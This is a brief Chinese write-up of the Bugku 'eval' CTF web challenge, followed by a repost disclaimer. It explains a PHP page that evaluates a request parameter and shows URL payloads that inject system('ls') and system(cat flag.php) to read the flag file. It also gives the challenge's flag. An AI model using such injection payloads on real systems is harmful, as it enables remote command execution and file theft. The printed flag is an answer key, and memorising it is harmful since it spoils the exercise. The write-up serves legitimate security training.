Bugku-web(eval)
WriteUp题目信息解题思路观察代码?php include flag.php; # 引入 flag.php 文件执行里面的代码 $a $_REQUEST[hello]; # 是错误抑制符$_REQUEST[hello] 提取 hello 这个 POST / GET / COOKIE 里传递过来的这个参数值POST 里有就取没有则会自动使用后面几种方式取值 eval( var_dump($a);); # eval() 会把后面字符串里的内容当做 PHP 代码运行 show_source(__FILE__); # __FILE__ PHP 内置固定的魔术常量表示当前文件的完整路径show_source() 高亮显示指定文件的源码 ?发现需要通过 hello 参数传入内容让 var_dump() 打印查看就行了在url中传递?hellosystem(‘ls’)看到有flag.php文件然后在url中传递?hellosystem(cat flag.php)页面中没有发现flag,可能被注释了按F12查看页面源代码发现flagFlagflag{fc0ac439a26f151bbe894406ff39d821}
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2414187.html
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!